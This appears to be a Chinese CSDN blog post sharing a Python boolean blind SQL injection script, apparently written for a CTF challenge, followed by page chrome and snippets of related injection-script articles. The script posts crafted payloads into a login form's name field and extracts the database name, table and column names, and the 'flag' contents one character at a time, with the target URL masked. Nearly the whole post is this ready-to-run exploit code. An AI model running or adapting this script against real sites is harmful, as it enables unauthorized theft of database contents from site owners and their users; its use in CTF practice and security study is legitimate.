sql盲注脚本

最新推荐文章于 2024-04-04 16:52:28 发布
最新推荐文章于 2024-04-04 16:52:28 发布
阅读量205 收藏 3
点赞数
分类专栏: web sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/since_2020/article/details/119703921
版权
web 同时被 2 个专栏收录
13 篇文章 0 订阅
订阅专栏
sql
3 篇文章 0 订阅
订阅专栏

盲注脚本

POST型
from time import sleep

import requests

s = requests.Session()
url = '******'
flag = ''

class Solution:

    # 数据库名
    def function_database(self,left_num, compare_str_num):
        payload = f"/**/or/**/ord(right(left((database()),{left_num}),1))={compare_str_num}#"
        
        data = {
            "name": '-1\'' + payload,
            "pass": "1"
        }
        r = s.post(url, data=data)

        if "\\u8d26\\u53f7\\u6216\\u5bc6\\u7801\\u9519\\u8bef" in r.text:
            return True
        else:
            return False

    # 表名
    def function_table(self,left_num, compare_str_num):
        payload = f"/**/or/**/ord(right(left((sELect/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()),{left_num}),1))={compare_str_num}#"
        
        data = {
            "name": '-1\'' + payload,
            "pass": "1"
        }
        r = s.post(url, data=data)

        if "\\u8d26\\u53f7\\u6216\\u5bc6\\u7801\\u9519\\u8bef" in r.text:
            return True
        else:
            return False

    # 字段名
    def function_column(self, left_num, compare_str_num):
        payload = f"/**/or/**/ord(right(left((sELect/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name='fl4g'),{left_num}),1))={compare_str_num}#"
        
        data = {
            "name": '-1\'' + payload,
            "pass": "1"
        }
        r = s.post(url, data=data)

        if "\\u8d26\\u53f7\\u6216\\u5bc6\\u7801\\u9519\\u8bef" in r.text:
            return True
        else:
            return False

    # 数据内容
    def function_content(self, left_num, compare_str_num):
        payload = f"/**/or/**/ord(right(left((sELect/**/flag/**/from/**/fl4g),{left_num}),1))={compare_str_num}#"
        
        data = {
            "name": '-1\'' + payload,
            "pass": "1"
        }
        r = s.post(url, data=data)

        if "\\u8d26\\u53f7\\u6216\\u5bc6\\u7801\\u9519\\u8bef" in r.text:
            return True
        else:
            return False


solve = Solution()

for left_num in range(1, 100):
    low = 32#32
    high = 127#127
    for compare_str_num in range(low, high):
        sleep(0.1)
        if solve.function_content(left_num, compare_str_num):
            flag += chr(compare_str_num)
            print(flag)

            break

print(flag)
white_&_black
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DVWA-SQL盲注脚本(全)
10-04
DVWA SQL盲注,Low,Medium,High 三个级别的bool盲注脚本,比较完整,配套解释 : https://blog.csdn.net/csdn_Pade/article/details/82886765
CTF用的各种脚本,各类古典加解密的脚本,RSA常用脚本SQL盲注脚本,编码加解密神器
12-29
- `web`:包含有关Web安全的脚本,如SQL盲注工具和HTTP请求构造器。 - `tools`:一些通用的安全工具,比如编码解码实用程序,可能还有其他辅助分析的脚本。 - `notes`:可能包含对各种技术的笔记和教程,帮助理解...
ctf各种sql盲注脚本
qq_51862722的博客
08-17 2862
以下的几个脚本都是自己写的(有参考别的大佬),代码可能不是最精简,但是还算顺眼 核心算法都是二分法,不推荐时间盲注(速度硬伤) 脚本payload参考题目:[第一章 web入门]SQL注入-2 / 极客大挑战finilysql(buuctf) 1.通过post传参的脚本 用的时候修改post参数和个数 1.1 基于异或盲注,布尔盲注等: import requests url = 'http://736aa374-b497-441f-9b6a-a1c91f9b182b.node4.buuoj.cn:
sql盲注python脚本
weixin_48266255的博客
08-29 457
【代码】sql盲注python脚本
sql盲注脚本编写
lyy0xfff的博客
08-01 1024
因为下学期要学python,又因为自己的python和编程能力实在是太弱了,所以想来学学python脚本编写的应用,就以sqli-labs里面的布尔盲注、时间盲注作为例子,来一步一步学习编写脚本 Requests库 写脚本注入的时候,用的最多的库就是requests库了,顺便学习一下它8!它可以在python中发出一个标准的HTTP请求。可以基本完全满足HTTP测试需求 安装库 pip install requests 导入库 import requests 请求(Request) params: u
SQL盲注及python脚本编写
nobugnomoney的博客
05-18 3498
1、什么是盲注 盲注就是在 sql 注入过程中,sql 语句执行的选择后,选择的数据不能回显 到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为盲注。从 background-1 中,我们可以知道盲注分为三类 基于布尔 SQL 盲注 基于时间的 SQL 盲注 基于报错的 SQL 盲注 0x01.基于布尔 SQL 盲注----------构造逻辑判断 left() :left(a,b)从左侧截取 a 的前 b 位 accii():Ascii()将某个字符转换 为 ascii
sql盲注自动化脚本编写
qq_57861415的博客
03-12 334
其实写的四个脚本大多其实都是一样的,其实稍微改动一些就可以用了,整体思路都差不多。
sql注入(时间盲注脚本,mysql结构)
最新发布
2401_82760239的博客
04-04 523
print("开始获取数据表", table, "的", column, "字段的第", i + 1, "行记录的长度")print("开始获取数据表", table, "的", column, "字段的第", i + 1, "行记录的内容")print("数据表", table, "第", index, "个字段的长度为", length)print("数据表", table, "第", index, "行数据的长度为", length)print ("目前已知数据库名", database)
SQL盲注脚本源码及通关步骤
weixin_62420492的博客
01-04 762
脚本源码 import requests import time headers = {'User-Agent':'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36'} chars = 'abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.' database = '' gl
SQL盲注之python脚本自动化注入
菜鸟学安全的博客
12-18 1394
sql盲注无法使用sql语句注入,需要大量的判断语句或者延时注入。这样手动注入方式比较慢,手动发现注入点后可以使用python编写脚本注入。
SQL盲注脚本(MySQL
卧龙居
11-13 1300
#coding:utf-8 import urllib.request import json """ SQL盲注脚本,适用于MYSQL数据库;CTF 0~1 SQL注入第二题 """ class SqlBlindInjection(object): def __init__(self): self.url = "http://eci-2zej1goyn9jgugq1cnzn.cloudeci1.ichunqiu.com/login.php" #条件为真的返回值.
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例.doc
07-09
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例 本文档主要讲解了如何结合手工注入编写一个SQL盲注脚本,以SQLi-Labs less16为例。整个过程可以分为两部分:分析测试注入点和获取数据库名编写脚本。 ...
sql盲注检测的简单脚本.zip
03-10
这个"sql盲注检测的简单脚本.zip"压缩包很可能包含了用于检测这种安全问题的脚本工具。 SQL盲注的基本原理是利用Web应用对用户输入数据的不当处理。如果一个应用直接将用户输入的参数拼接到SQL查询中,而没有进行...
布尔盲注.py_sql盲注python_
10-03
在这个场景中,我们关注的是一个名为"布尔盲注.py"的Python脚本,它显然是用于演示或执行SQL盲注的工具。 在SQL盲注中,攻击者通常不能直接看到查询结果,而是必须依赖于应用程序对查询成功或失败的间接响应。例如...
布尔盲注python脚本.zip
12-28
在给定的压缩包文件"布尔盲注python脚本.zip"中,有两个文件:bool_sql_post.py和bool_sql_get.py,分别对应于使用POST和GET方法进行布尔盲注的Python脚本。下面我们将详细讨论这两个知识点。 1. **布尔盲注原理**...
时间盲注python脚本.zip
12-28
在本压缩包"时间盲注python脚本.zip"中,包含两个Python脚本文件:time_sql_post.py和time_sql_get.py,分别用于POST和GET方法实现时间盲注自动化攻击。 首先,我们来详细了解一下时间盲注的基本原理。当服务器执行...
SQL盲注medium.pdf
05-13
SQL盲注medium.pdf 本文档主要讲解SQL盲注的技术,使用DVWA Security平台进行演示,难度设置为medium。下面我们将对每一步操作进行详细的解释和知识点总结。 一、DVWA Security平台的使用 DVWA Security是一个...
CTFSHOW web192 标注盲注脚本
05-04
脚本尝试通过 SQL 注入获取一个网站的 flag,实现过程是构造不同的 SQL 注入 payload 并发送 POST 请求,如果返回的响应中包含特定字符串,则说明获取到了一个字符,将其添加到 flag 中,最终输出完整的 flag。...
用python写一个sql盲注脚本
05-01
以下是一个基本的 Python SQL 盲注脚本,它可以用于测试 SQL 注入攻击: ```python import requests # 目标URL url = "http://example.com/login.php" # 注入参数 injection_param = "username" # 注入语句 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值